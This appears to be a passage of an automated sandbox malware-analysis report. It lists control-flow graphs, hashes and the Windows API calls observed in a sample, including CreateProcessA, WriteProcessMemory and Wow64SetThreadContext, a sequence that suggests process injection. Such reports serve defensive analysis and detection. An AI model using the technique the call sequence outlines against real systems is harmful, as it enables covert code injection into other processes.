6cd9300 26561 6cd948b 26560->26561 26562 6cd9326 26560->26562 26562->26561 26564 6cd7900 26562->26564 26565 6cd9580 PostMessageW 26564->26565 26566 6cd95ec 26565->26566 26566->26562

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 47 6d12106-6d1210a 48 6d1210b-6d12120 47->48 49 6d12acd-6d12adf 47->49 48->49 50 6d12121-6d1212c 48->50 52 6d12132-6d1213e 50->52 53 6d1214a-6d12159 52->53 55 6d121b8-6d121bc 53->55 56 6d121c2-6d121cb 55->56 57 6d12264-6d122ce 55->57 58 6d121d1-6d121e7 56->58 59 6d120c6-6d120d2 56->59 57->49 95 6d122d4-6d1281b 57->95 65 6d12239-6d1224b 58->65 66 6d121e9-6d121ec 58->66 59->49 61 6d120d8-6d120e4 59->61 63 6d120e6-6d120fa 61->63 64 6d1215b-6d12161 61->64 63->64 74 6d120fc-6d12105 63->74 64->49 67 6d12167-6d1217f 64->67 75 6d12251-6d12261 65->75 76 6d12a0c-6d12ac2 65->76 66->49 69 6d121f2-6d1222f 66->69 67->49 78 6d12185-6d121ad 67->78 69->57 91 6d12231-6d12237 69->91 74->47 76->49 78->55 91->65 91->66 173 6d12832-6d128c5 95->173 174 6d1281d-6d12827 95->174 175 6d128d0-6d12963 173->175 174->175 176 6d1282d 174->176 177 6d1296e-6d12a01 175->177 176->177 177->76
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 77df2d228825f2494ec75644b5cd1959e0e42b9b369647b0f448cd5692437a28
                                          • Instruction ID: 30306b4769ef857704fe599818324f0606930d61c29bb183afabf6495ec96e3c
                                          • Opcode Fuzzy Hash: 77df2d228825f2494ec75644b5cd1959e0e42b9b369647b0f448cd5692437a28
                                          • Instruction Fuzzy Hash: C652C574A00218DFDB68DF64D998A9DBBB6FF89300F1041D9D509AB365CB35AE81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2db41af880a0335988ce99a00269c4447b35b0216d4237180c27caababd2121
                                          • Instruction ID: 5d5dc2ab254009816195dfca6a6514f2d501bad957dca14630c2e9445bac5133
                                          • Opcode Fuzzy Hash: f2db41af880a0335988ce99a00269c4447b35b0216d4237180c27caababd2121
                                          • Instruction Fuzzy Hash: 36B2C075E00628DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c05dddd8187913f610598884af95919bcd863abab6b592a339662897a992f6bc
                                          • Instruction ID: 1f67706e6743e77b6bd660bdb7e3915a280309fd2aa34b2b958e2f164c390565
                                          • Opcode Fuzzy Hash: c05dddd8187913f610598884af95919bcd863abab6b592a339662897a992f6bc
                                          • Instruction Fuzzy Hash: 4761E6B5E0021C9FDB48DFEAD844AEEBBB6FF89300F148029E519AB254DB745946CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D07E
                                          • GetCurrentThread.KERNEL32 ref: 00F9D0BB
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D0F8
                                          • GetCurrentThreadId.KERNEL32 ref: 00F9D151
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: d568b10b4cdb4814c9e1220f4df1a4374cec603f4980558bd5564c3df4c77f41
                                          • Instruction ID: 476f4d12bc673e015ab64fdf495dc4782436200334d9eb8be0f85bb4400e7757
                                          • Opcode Fuzzy Hash: d568b10b4cdb4814c9e1220f4df1a4374cec603f4980558bd5564c3df4c77f41
                                          • Instruction Fuzzy Hash: 385166B1D00349CFEB14CFA9D548B9EBBF1AF88314F208459E409A73A1DBB55984CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D07E
                                          • GetCurrentThread.KERNEL32 ref: 00F9D0BB
                                          • GetCurrentProcess.KERNEL32 ref: 00F9D0F8
                                          • GetCurrentThreadId.KERNEL32 ref: 00F9D151
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 96e0974fa96c77b8f5e784af834a4d6915f292f5fa4d83d11861953d99c37f5b
                                          • Instruction ID: 07945c75d5daaabaeaa676b535c0ad8bc0be5e7179a9c50fb9b57034bd5463f4
                                          • Opcode Fuzzy Hash: 96e0974fa96c77b8f5e784af834a4d6915f292f5fa4d83d11861953d99c37f5b
                                          • Instruction Fuzzy Hash: 0D5144B1D00709CFEB14CFAAD648B9EBBF1AF88314F208459E409A7260DBB55984CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 202 6cd583d-6cd58d5 205 6cd590e-6cd592e 202->205 206 6cd58d7-6cd58e1 202->206 213 6cd5967-6cd5996 205->213 214 6cd5930-6cd593a 205->214 206->205 207 6cd58e3-6cd58e5 206->207 208 6cd5908-6cd590b 207->208 209 6cd58e7-6cd58f1 207->209 208->205 211 6cd58f5-6cd5904 209->211 212 6cd58f3 209->212 211->211 216 6cd5906 211->216 212->211 222 6cd59cf-6cd5a89 CreateProcessA 213->222 223 6cd5998-6cd59a2 213->223 214->213 215 6cd593c-6cd593e 214->215 217 6cd5961-6cd5964 215->217 218 6cd5940-6cd594a 215->218 216->208 217->213 220 6cd594c 218->220 221 6cd594e-6cd595d 218->221 220->221 221->221 224 6cd595f 221->224 234 6cd5a8b-6cd5a91 222->234 235 6cd5a92-6cd5b18 222->235 223->222 225 6cd59a4-6cd59a6 223->225 224->217 227 6cd59c9-6cd59cc 225->227 228 6cd59a8-6cd59b2 225->228 227->222 229 6cd59b4 228->229 230 6cd59b6-6cd59c5 228->230 229->230 230->230 232 6cd59c7 230->232 232->227 234->235 245 6cd5b28-6cd5b2c 235->245 246 6cd5b1a-6cd5b1e 235->246 248 6cd5b3c-6cd5b40 245->248 249 6cd5b2e-6cd5b32 245->249 246->245 247 6cd5b20 246->247 247->245 251 6cd5b50-6cd5b54 248->251 252 6cd5b42-6cd5b46 248->252 249->248 250 6cd5b34 249->250 250->248 254 6cd5b66-6cd5b6d 251->254 255 6cd5b56-6cd5b5c 251->255 252->251 253 6cd5b48 252->253 253->251 256 6cd5b6f-6cd5b7e 254->256 257 6cd5b84 254->257 255->254 256->257 259 6cd5b85 257->259 259->259
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CD5A76
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 79e3ffa10256fb829287e5fd85302194be7bdc37c27f4fa3323aedb19863827e
                                          • Instruction ID: 3e26bad7e0dd8601194100e8619a07a080ce361b21173316fdfe9742ff858bd5
                                          • Opcode Fuzzy Hash: 79e3ffa10256fb829287e5fd85302194be7bdc37c27f4fa3323aedb19863827e
                                          • Instruction Fuzzy Hash: 9A916B71D00219DFEF50CF68C841BEDBBB2BF48310F5485A9E908A7280DB759A85CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 260 6cd5840-6cd58d5 262 6cd590e-6cd592e 260->262 263 6cd58d7-6cd58e1 260->263 270 6cd5967-6cd5996 262->270 271 6cd5930-6cd593a 262->271 263->262 264 6cd58e3-6cd58e5 263->264 265 6cd5908-6cd590b 264->265 266 6cd58e7-6cd58f1 264->266 265->262 268 6cd58f5-6cd5904 266->268 269 6cd58f3 266->269 268->268 273 6cd5906 268->273 269->268 279 6cd59cf-6cd5a89 CreateProcessA 270->279 280 6cd5998-6cd59a2 270->280 271->270 272 6cd593c-6cd593e 271->272 274 6cd5961-6cd5964 272->274 275 6cd5940-6cd594a 272->275 273->265 274->270 277 6cd594c 275->277 278 6cd594e-6cd595d 275->278 277->278 278->278 281 6cd595f 278->281 291 6cd5a8b-6cd5a91 279->291 292 6cd5a92-6cd5b18 279->292 280->279 282 6cd59a4-6cd59a6 280->282 281->274 284 6cd59c9-6cd59cc 282->284 285 6cd59a8-6cd59b2 282->285 284->279 286 6cd59b4 285->286 287 6cd59b6-6cd59c5 285->287 286->287 287->287 289 6cd59c7 287->289 289->284 291->292 302 6cd5b28-6cd5b2c 292->302 303 6cd5b1a-6cd5b1e 292->303 305 6cd5b3c-6cd5b40 302->305 306 6cd5b2e-6cd5b32 302->306 303->302 304 6cd5b20 303->304 304->302 308 6cd5b50-6cd5b54 305->308 309 6cd5b42-6cd5b46 305->309 306->305 307 6cd5b34 306->307 307->305 311 6cd5b66-6cd5b6d 308->311 312 6cd5b56-6cd5b5c 308->312 309->308 310 6cd5b48 309->310 310->308 313 6cd5b6f-6cd5b7e 311->313 314 6cd5b84 311->314 312->311 313->314 316 6cd5b85 314->316 316->316
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CD5A76
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: e5dc9f500b550cad5697da47bf6c2bf0ddfae94327dc5134824623194ebfd23b
                                          • Instruction ID: d072cb04fffae3937d71a99ae6e4107b80724b428916728cffe9b5d9dbef0bb4
                                          • Opcode Fuzzy Hash: e5dc9f500b550cad5697da47bf6c2bf0ddfae94327dc5134824623194ebfd23b
                                          • Instruction Fuzzy Hash: 57915A71D00619DFEF50CF68C881BEDBBB2BF48310F5485A9E918A7280DB759A85CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 317 f9ad68-f9ad77 318 f9ad79-f9ad86 call f9a08c 317->318 319 f9ada3-f9ada7 317->319 326 f9ad88 318->326 327 f9ad9c 318->327 320 f9ada9-f9adb3 319->320 321 f9adbb-f9adfc 319->321 320->321 328 f9ae09-f9ae17 321->328 329 f9adfe-f9ae06 321->329 378 f9ad8e call f9aff1 326->378 379 f9ad8e call f9b000 326->379 327->319 330 f9ae19-f9ae1e 328->330 331 f9ae3b-f9ae3d 328->331 329->328 334 f9ae29 330->334 335 f9ae20-f9ae27 call f9a098 330->335 333 f9ae40-f9ae47 331->333 332 f9ad94-f9ad96 332->327 336 f9aed8-f9aeef 332->336 337 f9ae49-f9ae51 333->337 338 f9ae54-f9ae5b 333->338 340 f9ae2b-f9ae39 334->340 335->340 350 f9aef1-f9af50 336->350 337->338 341 f9ae68-f9ae6a call f9a0a8 338->341 342 f9ae5d-f9ae65 338->342 340->333 346 f9ae6f-f9ae71 341->346 342->341 348 f9ae7e-f9ae83 346->348 349 f9ae73-f9ae7b 346->349 351 f9aea1-f9aeae 348->351 352 f9ae85-f9ae8c 348->352 349->348 368 f9af52 350->368 357 f9aed1-f9aed7 351->357 358 f9aeb0-f9aece 351->358 352->351 353 f9ae8e-f9ae9e call f9a0b8 call f9a0c8 352->353 353->351 358->357 369 f9af54-f9af55 368->369 370 f9af56 368->370 369->370 371 f9af58-f9af59 370->371 372 f9af5a-f9af98 370->372 371->372 373 f9af9a-f9af9d 372->373 374 f9afa0-f9afcb GetModuleHandleW 372->374 373->374 375 f9afcd-f9afd3 374->375 376 f9afd4-f9afe8 374->376 375->376 378->332 379->332
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9AFBE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: b792924d743197f84384c44733841de33f5acfc55495f141a84b7332eced497b
                                          • Instruction ID: dae8ca3d3900b3a04a6bc36db7989372d98a0822b03d4738bc38f751bf8fbb2f
                                          • Opcode Fuzzy Hash: b792924d743197f84384c44733841de33f5acfc55495f141a84b7332eced497b
                                          • Instruction Fuzzy Hash: F2814770A00B058FEB64DF2AD44575ABBF1FF88314F108A2DD44AD7A50DB75E849CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 380 f9590c-f95912 381 f95914 380->381 382 f95916-f9598c 380->382 381->382 384 f9598f-f959d9 CreateActCtxA 382->384 386 f959db-f959e1 384->386 387 f959e2-f95a3c 384->387 386->387 394 f95a4b-f95a4f 387->394 395 f95a3e-f95a41 387->395 396 f95a51-f95a5d 394->396 397 f95a60 394->397 395->394 396->397 399 f95a61 397->399 399->399
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 23348dae3886c843c69cd05a1fd13f6961db21f040645a3a635ae3964e1b1b48
                                          • Instruction ID: a00ee6b77c9a90fa7acd812b17699bceccbc5c5f234326498d492704b42d662b
                                          • Opcode Fuzzy Hash: 23348dae3886c843c69cd05a1fd13f6961db21f040645a3a635ae3964e1b1b48
                                          • Instruction Fuzzy Hash: 2541F2B0C00719CBEF25CFA9C88479EBBB5BF48714F20816AD408AB255DB756945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 400 f95a84-f95b14
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0083fbc09ecebb26a4cbf37193f1d1b44713ea1f1f8720459aacb8a270b39ec5
                                          • Instruction ID: 60a957aa910c529a91c7b25e4b35e038118731fe65824ff9326bf51c65260bb7
                                          • Opcode Fuzzy Hash: 0083fbc09ecebb26a4cbf37193f1d1b44713ea1f1f8720459aacb8a270b39ec5
                                          • Instruction Fuzzy Hash: 2331DF71C00B58CFEF12CFA9C8447ADBBF1AF95B24F504189C405AB256C7799906DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 403 f944b4-f959d9 CreateActCtxA 407 f959db-f959e1 403->407 408 f959e2-f95a3c 403->408 407->408 415 f95a4b-f95a4f 408->415 416 f95a3e-f95a41 408->416 417 f95a51-f95a5d 415->417 418 f95a60 415->418 416->415 417->418 420 f95a61 418->420 420->420
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: acbcb7e06a00b45853ada948c97b82a2a3c6f71f15e4e44f886bbfba1d11a67b
                                          • Instruction ID: 903603e65f63cb3c9565161148ef98108c77aaec7c7cc264436973365c81f64d
                                          • Opcode Fuzzy Hash: acbcb7e06a00b45853ada948c97b82a2a3c6f71f15e4e44f886bbfba1d11a67b
                                          • Instruction Fuzzy Hash: 1341E2B0C0071DCBEF25CFAAC88478EBBB5BF44714F608159D408AB251DBB56945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 421 6cd55b7-6cd5606 424 6cd5608-6cd5614 421->424 425 6cd5616-6cd5655 WriteProcessMemory 421->425 424->425 427 6cd565e-6cd568e 425->427 428 6cd5657-6cd565d 425->428 428->427
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CD5648
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 40fe74ec9cdcaa740173b1361b4a737ac20d23c7ee7b41cf9284b7774cd09c10
                                          • Instruction ID: 8a022c3bc5fb394857929e219247e9b9f206ae48767a8f7189c8a0e17e6ce8a9
                                          • Opcode Fuzzy Hash: 40fe74ec9cdcaa740173b1361b4a737ac20d23c7ee7b41cf9284b7774cd09c10
                                          • Instruction Fuzzy Hash: 032127759003499FDF10CFA9C981BDEBBF5FF48320F50842AEA18A7240D7789951CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 432 6cd55b8-6cd5606 434 6cd5608-6cd5614 432->434 435 6cd5616-6cd5655 WriteProcessMemory 432->435 434->435 437 6cd565e-6cd568e 435->437 438 6cd5657-6cd565d 435->438 438->437
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CD5648
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 1a6443a2f7fb8adc7ae3747034a6505fc9a5353964f1e3237db392ee5d04b8ce
                                          • Instruction ID: 53607f642018ef34b4f1430064d2eedc43f69321bdf15723ea37d47a8c27aa41
                                          • Opcode Fuzzy Hash: 1a6443a2f7fb8adc7ae3747034a6505fc9a5353964f1e3237db392ee5d04b8ce
                                          • Instruction Fuzzy Hash: E72127719003499FDF10CFA9C981BDEBBF5FF48320F50842AEA18A7240D7789951CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 448 6cd56a0-6cd5735 ReadProcessMemory 452 6cd573e-6cd576e 448->452 453 6cd5737-6cd573d 448->453 453->452
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CD5728
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: fccdc5000052256dc8af88a2b5ac97ee3544de8863b44b060f183c35ac71d334
                                          • Instruction ID: 8baea44ad0a08f227dc7f93c2c54ba801b5ab8d4ef19e64bccdd20730df6708d
                                          • Opcode Fuzzy Hash: fccdc5000052256dc8af88a2b5ac97ee3544de8863b44b060f183c35ac71d334
                                          • Instruction Fuzzy Hash: F42139718003499FDF10CFAAC981BDEBBF5FF88320F508429E918A7240D7789550CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 442 f9d648-f9d64e 443 f9d650-f9d6e4 DuplicateHandle 442->443 444 f9d6ed-f9d70a 443->444 445 f9d6e6-f9d6ec 443->445 445->444
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D6D7
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 3d0251f5c1fc30156fd31c4f78b3280a71ec8ca390ecfd999b5d25af58b2d6ff
                                          • Instruction ID: 1c357cca5f25a17b8dff9c02de51bc88667099f748354b506093da44526b6be5
                                          • Opcode Fuzzy Hash: 3d0251f5c1fc30156fd31c4f78b3280a71ec8ca390ecfd999b5d25af58b2d6ff
                                          • Instruction Fuzzy Hash: 3C2103B59002099FDF10CF9AD884AEEBFF5FB48320F20801AE918A3310C378A950CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 457 6cd4fe7-6cd5033 460 6cd5035-6cd5041 457->460 461 6cd5043-6cd5073 Wow64SetThreadContext 457->461 460->461 463 6cd507c-6cd50ac 461->463 464 6cd5075-6cd507b 461->464 464->463
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CD5066
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: ae36e71c5e61543bd9cbed1bede1bcf98a6baf166f3719c56c7194ab43775b27
                                          • Instruction ID: 379981be4448fae9039a9c27cb4425397d245b7b127c79ccb20ae250d6a8dd26
                                          • Opcode Fuzzy Hash: ae36e71c5e61543bd9cbed1bede1bcf98a6baf166f3719c56c7194ab43775b27
                                          • Instruction Fuzzy Hash: E0216871D003098FDB10DFAAC881BEEBBF4AF88324F54842DD518A7240CB78A944CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CD5728
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 53538043139eb4d2e6f8d87b646c41df3b9c97e2976dc95d0fcb86ec0eda1b97
                                          • Instruction ID: 44a14c171b8a7bfe1b38e4696bcaf0843e1101ff5881521e6e17ca49ded13a77
                                          • Opcode Fuzzy Hash: 53538043139eb4d2e6f8d87b646c41df3b9c97e2976dc95d0fcb86ec0eda1b97
                                          • Instruction Fuzzy Hash: 1F2116B18003499FDB10CFAAC981ADEBBF5FF48320F508429E918A7240D7789550CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 468 6cd4fe8-6cd5033 470 6cd5035-6cd5041 468->470 471 6cd5043-6cd5073 Wow64SetThreadContext 468->471 470->471 473 6cd507c-6cd50ac 471->473 474 6cd5075-6cd507b 471->474 474->473
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CD5066
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150461649.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6cd0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: ae662d1f66e10232730b2aae30e1327d2ad389f0ef3056c643459ff9fe9aaea7
                                          • Instruction ID: 751ff9774aca9b88c3bf4d6008fd91b96ab0b68ad8ff3741c80e159bb46907f4
                                          • Opcode Fuzzy Hash: ae662d1f66e10232730b2aae30e1327d2ad389f0ef3056c643459ff9fe9aaea7
                                          • Instruction Fuzzy Hash: 8C213871D003498FDB50DFAAC4857EEBBF4AF88364F54842DD519A7240CB78A944CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D6D7
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 21203e513bd475d574e8fd7be73a05a5e962348d819eef4bf7d7d0142c7bb0fb
                                          • Instruction ID: d6be0a077b798bfe72b8db3eb97b7cc750cafb913b43b8a057186bccda701039
                                          • Opcode Fuzzy Hash: 21203e513bd475d574e8fd7be73a05a5e962348d819eef4bf7d7d0142c7bb0fb
                                          • Instruction Fuzzy Hash: 3E21C4B5900249DFDB10CF9AD984ADEBBF5FB48320F14841AE918A7350D374A954CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F9B039,00000800,00000000,00000000), ref: 00F9B24A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 3400d13ea4f712a4264fbd07989a8cad2c8241c9ef5dbef86e4dd317b6884bf4
                                          • Instruction ID: 8cbf732e4b34c7067442db8f60880d83c6b82b879f296299a4c6b9a59cc718b1
                                          • Opcode Fuzzy Hash: 3400d13ea4f712a4264fbd07989a8cad2c8241c9ef5dbef86e4dd317b6884bf4
                                          • Instruction Fuzzy Hash: 442144B2C003499FDB10CF9AD944AEEFBF5EB88320F14842AD915A7200C3B5A945CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F9B039,00000800,00000000,00000000), ref: 00F9B24A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2146191795.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_f90000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
